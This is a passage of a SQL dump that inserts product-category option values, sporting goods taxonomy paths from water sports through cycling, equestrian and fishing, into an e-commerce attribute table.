(4594, 4594, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Water Sport Apparel > Wetsuit Pieces > Wetsuit Tops'),
(4595, 4595, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Water Sport Apparel > Wetsuits'),
(4596, 4596, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Diving & Snorkeling'),
(4597, 4597, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Diving & Snorkeling > Buoyancy Compensators'),
(4598, 4598, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Diving & Snorkeling > Dive Computers'),
(4599, 4599, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Diving & Snorkeling > Diving & Snorkeling Equipment Sets'),
(4600, 4600, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Diving & Snorkeling > Diving & Snorkeling Fins'),
(4601, 4601, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Diving & Snorkeling > Diving & Snorkeling Masks'),
(4602, 4602, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Diving & Snorkeling > Diving Belts'),
(4603, 4603, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Diving & Snorkeling > Diving Knives & Shears'),
(4604, 4604, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Diving & Snorkeling > Diving Regulators'),
(4605, 4605, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Diving & Snorkeling > Snorkels'),
(4606, 4606, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Kitesurfing'),
(4607, 4607, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Kitesurfing > Kiteboard Cases'),
(4608, 4608, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Kitesurfing > Kiteboard Parts'),
(4609, 4609, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Kitesurfing > Kiteboards'),
(4610, 4610, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Kitesurfing > Kitesurfing & Windsurfing Harnesses'),
(4611, 4611, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Kitesurfing > Kitesurfing Kites'),
(4612, 4612, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Surfing'),
(4613, 4613, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Surfing > Bodyboards'),
(4614, 4614, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Surfing > Paddleboards'),
(4615, 4615, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Surfing > Skimboards'),
(4616, 4616, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Surfing > Surf Leashes'),
(4617, 4617, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Surfing > Surfboard Cases & Bags'),
(4618, 4618, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Surfing > Surfboard Fins'),
(4619, 4619, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Surfing > Surfboard Wax'),
(4620, 4620, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Surfing > Surfboards'),
(4621, 4621, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Surfing > Surfing Gloves'),
(4622, 4622, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Surfing > Surfing Tail Pads'),
(4623, 4623, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Swimming'),
(4624, 4624, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Swimming > Child Swimming Aids'),
(4625, 4625, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Swimming > Hand Paddles'),
(4626, 4626, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Swimming > Kickboards'),
(4627, 4627, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Swimming > Pull Buoys'),
(4628, 4628, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Swimming > Swim Belts'),
(4629, 4629, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Swimming > Swim Caps'),
(4630, 4630, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Swimming > Swim Gloves'),
(4631, 4631, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Swimming > Swim Goggle & Mask Accessories'),
(4632, 4632, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Swimming > Swim Goggles & Masks'),
(4633, 4633, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Swimming > Swim Weights'),
(4634, 4634, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Swimming > Swimming Fins'),
(4635, 4635, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Swimming > Swimming Fins > Monofins'),
(4636, 4636, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Swimming > Swimming Fins > Training Fins'),
(4637, 4637, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Swimming > Swimming Machines'),
(4638, 4638, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Swimming > Swimming Nose Clips'),
(4639, 4639, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Towed Water Sports'),
(4640, 4640, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Towed Water Sports > Kneeboarding'),
(4641, 4641, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Towed Water Sports > Kneeboarding > Kneeboards'),
(4642, 4642, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Towed Water Sports > Towable Rafts & Tubes'),
(4643, 4643, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Towed Water Sports > Towed Water Sport Gloves'),
(4644, 4644, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Towed Water Sports > Wakeboarding'),
(4645, 4645, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Towed Water Sports > Wakeboarding > Kiteboard & Wakeboard Bindings'),
(4646, 4646, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Towed Water Sports > Wakeboarding > Wakeboard Parts'),
(4647, 4647, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Towed Water Sports > Wakeboarding > Wakeboards'),
(4648, 4648, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Towed Water Sports > Water Skiing'),
(4649, 4649, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Towed Water Sports > Water Skiing > Sit-Down Hydrofoils'),
(4650, 4650, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Towed Water Sports > Water Skiing > Water Ski Bindings'),
(4651, 4651, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Towed Water Sports > Water Skiing > Water Ski Cases & Bags'),
(4652, 4652, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Towed Water Sports > Water Skiing > Water Skis'),
(4653, 4653, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Towed Water Sports > Water Sport Tow Cables'),
(4654, 4654, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Watercraft Storage Racks'),
(4655, 4655, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Watercraft Storage Racks > Boat Storage Racks'),
(4656, 4656, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Watercraft Storage Racks > Water Sport Board Storage Racks'),
(4657, 4657, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Windsurfing'),
(4658, 4658, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Windsurfing > Windsurfing Board Parts'),
(4659, 4659, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Windsurfing > Windsurfing Board Parts > Windsurfing Board Fins'),
(4660, 4660, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Windsurfing > Windsurfing Board Parts > Windsurfing Board Masts'),
(4661, 4661, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Windsurfing > Windsurfing Boards'),
(4662, 4662, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Windsurfing > Windsurfing Sails'),
(4663, 4663, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking'),
(4664, 4664, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Camp Furniture'),
(4665, 4665, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Camp Furniture > Air Mattress & Sleeping Pad Accessories'),
(4666, 4666, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Camp Furniture > Air Mattresses'),
(4667, 4667, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Camp Furniture > Cots'),
(4668, 4668, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Camping Cookware & Dinnerware'),
(4669, 4669, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Camping Lights & Lanterns'),
(4670, 4670, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Camping Tools'),
(4671, 4671, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Camping Tools > Hunting & Survival Knives'),
(4672, 4672, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Camping Tools > Multifunction Tools & Knives'),
(4673, 4673, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Chemical Hand Warmers'),
(4674, 4674, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Compression Sacks'),
(4675, 4675, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Hiking Pole Accessories'),
(4676, 4676, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Hiking Poles'),
(4677, 4677, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Mosquito Nets & Insect Screens'),
(4678, 4678, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Navigational Compasses'),
(4679, 4679, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Portable Toilets & Showers'),
(4680, 4680, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Portable Toilets & Showers > Portable Showers & Privacy Enclosures'),
(4681, 4681, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Portable Toilets & Showers > Portable Toilets & Urination Devices'),
(4682, 4682, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Portable Water Filters & Purifiers'),
(4683, 4683, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Sleeping Bag Liners'),
(4684, 4684, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Sleeping Bags'),
(4685, 4685, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Sleeping Pads'),
(4686, 4686, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Tent Accessories'),
(4687, 4687, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Tent Accessories > Inner Tents'),
(4688, 4688, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Tent Accessories > Tent Footprints'),
(4689, 4689, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Tent Accessories > Tent Poles & Stakes'),
(4690, 4690, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Tent Accessories > Tent Vestibules'),
(4691, 4691, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Tents'),
(4692, 4692, 0, 'Sporting Goods > Outdoor Recreation > Camping & Hiking > Windbreaks'),
(4693, 4693, 0, 'Sporting Goods > Outdoor Recreation > Climbing'),
(4694, 4694, 0, 'Sporting Goods > Outdoor Recreation > Climbing > Belay Devices'),
(4695, 4695, 0, 'Sporting Goods > Outdoor Recreation > Climbing > Carabiners'),
(4696, 4696, 0, 'Sporting Goods > Outdoor Recreation > Climbing > Climbing Apparel & Accessories'),
(4697, 4697, 0, 'Sporting Goods > Outdoor Recreation > Climbing > Climbing Apparel & Accessories > Climbing Gloves'),
(4698, 4698, 0, 'Sporting Goods > Outdoor Recreation > Climbing > Climbing Apparel & Accessories > Climbing Helmets'),
(4699, 4699, 0, 'Sporting Goods > Outdoor Recreation > Climbing > Climbing Apparel & Accessories > Crampons'),
(4700, 4700, 0, 'Sporting Goods > Outdoor Recreation > Climbing > Climbing Ascenders & Descenders'),
(4701, 4701, 0, 'Sporting Goods > Outdoor Recreation > Climbing > Climbing Chalk Bags'),
(4702, 4702, 0, 'Sporting Goods > Outdoor Recreation > Climbing > Climbing Crash Pads'),
(4703, 4703, 0, 'Sporting Goods > Outdoor Recreation > Climbing > Climbing Harnesses'),
(4704, 4704, 0, 'Sporting Goods > Outdoor Recreation > Climbing > Climbing Protection Devices'),
(4705, 4705, 0, 'Sporting Goods > Outdoor Recreation > Climbing > Climbing Rope'),
(4706, 4706, 0, 'Sporting Goods > Outdoor Recreation > Climbing > Climbing Rope Bags'),
(4707, 4707, 0, 'Sporting Goods > Outdoor Recreation > Climbing > Climbing Webbing'),
(4708, 4708, 0, 'Sporting Goods > Outdoor Recreation > Climbing > Ice Climbing Tools'),
(4709, 4709, 0, 'Sporting Goods > Outdoor Recreation > Climbing > Ice Screws'),
(4710, 4710, 0, 'Sporting Goods > Outdoor Recreation > Climbing > Indoor Climbing Holds'),
(4711, 4711, 0, 'Sporting Goods > Outdoor Recreation > Climbing > Quickdraws'),
(4712, 4712, 0, 'Sporting Goods > Outdoor Recreation > Cycling'),
(4713, 4713, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories'),
(4714, 4714, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Bags & Panniers'),
(4715, 4715, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Baskets'),
(4716, 4716, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Bells & Horns'),
(4717, 4717, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Cages'),
(4718, 4718, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Child Seat Accessories'),
(4719, 4719, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Child Seats'),
(4720, 4720, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Computer Accessories'),
(4721, 4721, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Computers'),
(4722, 4722, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Covers'),
(4723, 4723, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Fenders'),
(4724, 4724, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Front & Rear Racks'),
(4725, 4725, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Handlebar Grips & Decor'),
(4726, 4726, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Locks'),
(4727, 4727, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Mirrors'),
(4728, 4728, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Pumps'),
(4729, 4729, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Saddle Pads & Seat Covers'),
(4730, 4730, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Shock Pumps'),
(4731, 4731, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Spoke Beads'),
(4732, 4732, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Stands & Storage'),
(4733, 4733, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Tire Repair Supplies & Kits'),
(4734, 4734, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Toe Straps & Clips'),
(4735, 4735, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Tools'),
(4736, 4736, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Trailers'),
(4737, 4737, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Trainers'),
(4738, 4738, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Training Wheels'),
(4739, 4739, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Transport Bags & Cases'),
(4740, 4740, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Bicycle Water Sport Board Racks'),
(4741, 4741, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Accessories > Electric Bicycle Conversion Kits'),
(4742, 4742, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts');
INSERT INTO `eav_attribute_option_value` (`value_id`, `option_id`, `store_id`, `value`) VALUES
(4743, 4743, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Brake Parts'),
(4744, 4744, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Brake Parts > Bicycle Brake Calipers'),
(4745, 4745, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Brake Parts > Bicycle Brake Levers'),
(4746, 4746, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Brake Parts > Bicycle Brake Rotors'),
(4747, 4747, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Brake Parts > Bicycle Brake Sets'),
(4748, 4748, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Cable Housings'),
(4749, 4749, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Cables'),
(4750, 4750, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Drivetrain Parts'),
(4751, 4751, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Drivetrain Parts > Bicycle Bottom Brackets'),
(4752, 4752, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Drivetrain Parts > Bicycle Cassettes & Freewheels'),
(4753, 4753, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Drivetrain Parts > Bicycle Chainrings'),
(4754, 4754, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Drivetrain Parts > Bicycle Chains'),
(4755, 4755, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Drivetrain Parts > Bicycle Cranks'),
(4756, 4756, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Drivetrain Parts > Bicycle Derailleurs'),
(4757, 4757, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Drivetrain Parts > Bicycle Pedals'),
(4758, 4758, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Drivetrain Parts > Bicycle Shifters'),
(4759, 4759, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Forks'),
(4760, 4760, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Frames'),
(4761, 4761, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Groupsets'),
(4762, 4762, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Handlebar Extensions'),
(4763, 4763, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Handlebars'),
(4764, 4764, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Headset Parts'),
(4765, 4765, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Headset Parts > Bicycle Headset Bearings'),
(4766, 4766, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Headset Parts > Bicycle Headset Spacers'),
(4767, 4767, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Headsets'),
(4768, 4768, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Kickstands'),
(4769, 4769, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Saddles'),
(4770, 4770, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Seatpost Clamps'),
(4771, 4771, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Seatposts'),
(4772, 4772, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Small Parts'),
(4773, 4773, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Stems'),
(4774, 4774, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Tire Valve Adapters'),
(4775, 4775, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Tire Valve Caps'),
(4776, 4776, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Tire Valves'),
(4777, 4777, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Tires'),
(4778, 4778, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Tubes'),
(4779, 4779, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Wheel Parts'),
(4780, 4780, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Wheel Parts > Bicycle Foot Pegs'),
(4781, 4781, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Wheel Parts > Bicycle Hub Parts'),
(4782, 4782, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Wheel Parts > Bicycle Hubs'),
(4783, 4783, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Wheel Parts > Bicycle Rim Strips'),
(4784, 4784, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Wheel Parts > Bicycle Spokes'),
(4785, 4785, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Wheel Parts > Bicycle Wheel Axles & Skewers'),
(4786, 4786, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Wheel Parts > Bicycle Wheel Nipples'),
(4787, 4787, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Wheel Parts > Bicycle Wheel Rims'),
(4788, 4788, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycle Parts > Bicycle Wheels'),
(4789, 4789, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Bicycles'),
(4790, 4790, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Cycling Apparel & Accessories'),
(4791, 4791, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Cycling Apparel & Accessories > Bicycle Cleat Accessories'),
(4792, 4792, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Cycling Apparel & Accessories > Bicycle Cleat Accessories > Bicycle Cleat Bolts'),
(4793, 4793, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Cycling Apparel & Accessories > Bicycle Cleat Accessories > Bicycle Cleat Covers'),
(4794, 4794, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Cycling Apparel & Accessories > Bicycle Cleat Accessories > Bicycle Cleat Shims & Wedges'),
(4795, 4795, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Cycling Apparel & Accessories > Bicycle Cleats'),
(4796, 4796, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Cycling Apparel & Accessories > Bicycle Gloves'),
(4797, 4797, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Cycling Apparel & Accessories > Bicycle Helmet Parts & Accessories'),
(4798, 4798, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Cycling Apparel & Accessories > Bicycle Helmets'),
(4799, 4799, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Cycling Apparel & Accessories > Bicycle Protective Pads'),
(4800, 4800, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Cycling Apparel & Accessories > Bicycle Shoe Covers'),
(4801, 4801, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Tricycle Accessories'),
(4802, 4802, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Tricycles'),
(4803, 4803, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Unicycle Accessories'),
(4804, 4804, 0, 'Sporting Goods > Outdoor Recreation > Cycling > Unicycles'),
(4805, 4805, 0, 'Sporting Goods > Outdoor Recreation > Equestrian'),
(4806, 4806, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Care'),
(4807, 4807, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Care > Horse Blankets & Sheets'),
(4808, 4808, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Care > Horse Boots & Leg Wraps'),
(4809, 4809, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Care > Horse Feed'),
(4810, 4810, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Care > Horse Fly Masks'),
(4811, 4811, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Care > Horse Grooming'),
(4812, 4812, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Care > Horse Grooming > Horse Clippers & Trimmers'),
(4813, 4813, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Care > Horse Grooming > Horse Grooming Combs, Brushes & Mitts'),
(4814, 4814, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Care > Horse Treats'),
(4815, 4815, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Care > Horse Vitamins & Supplements'),
(4816, 4816, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Care > Horse Wormers'),
(4817, 4817, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Tack'),
(4818, 4818, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Tack > Bridle Bits'),
(4819, 4819, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Tack > Bridles'),
(4820, 4820, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Tack > Cinches'),
(4821, 4821, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Tack > Horse Halters'),
(4822, 4822, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Tack > Horse Harnesses'),
(4823, 4823, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Tack > Horse Leads'),
(4824, 4824, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Tack > Reins'),
(4825, 4825, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Tack > Saddles'),
(4826, 4826, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Tack > Stirrups'),
(4827, 4827, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Tack Accessories'),
(4828, 4828, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Tack Accessories > Horse Tack Boxes'),
(4829, 4829, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Tack Accessories > Saddle Accessories'),
(4830, 4830, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Tack Accessories > Saddle Accessories > Saddle Bags & Panniers'),
(4831, 4831, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Tack Accessories > Saddle Accessories > Saddle Covers & Cases'),
(4832, 4832, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Tack Accessories > Saddle Accessories > Saddle Pads & Blankets'),
(4833, 4833, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Horse Tack Accessories > Saddle Accessories > Saddle Racks'),
(4834, 4834, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Riding Apparel & Accessories'),
(4835, 4835, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Riding Apparel & Accessories > Equestrian Gloves'),
(4836, 4836, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Riding Apparel & Accessories > Equestrian Helmets'),
(4837, 4837, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Riding Apparel & Accessories > Riding Crops & Whips'),
(4838, 4838, 0, 'Sporting Goods > Outdoor Recreation > Equestrian > Riding Apparel & Accessories > Riding Pants'),
(4839, 4839, 0, 'Sporting Goods > Outdoor Recreation > Fishing'),
(4840, 4840, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Bite Alarms'),
(4841, 4841, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing & Hunting Waders'),
(4842, 4842, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Bait & Chum Containers'),
(4843, 4843, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Gaffs'),
(4844, 4844, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Hook Removal Tools'),
(4845, 4845, 0, 'Sporting Goods > Outdoor Recreation > Fishing > Fishing Lines & Leaders'),
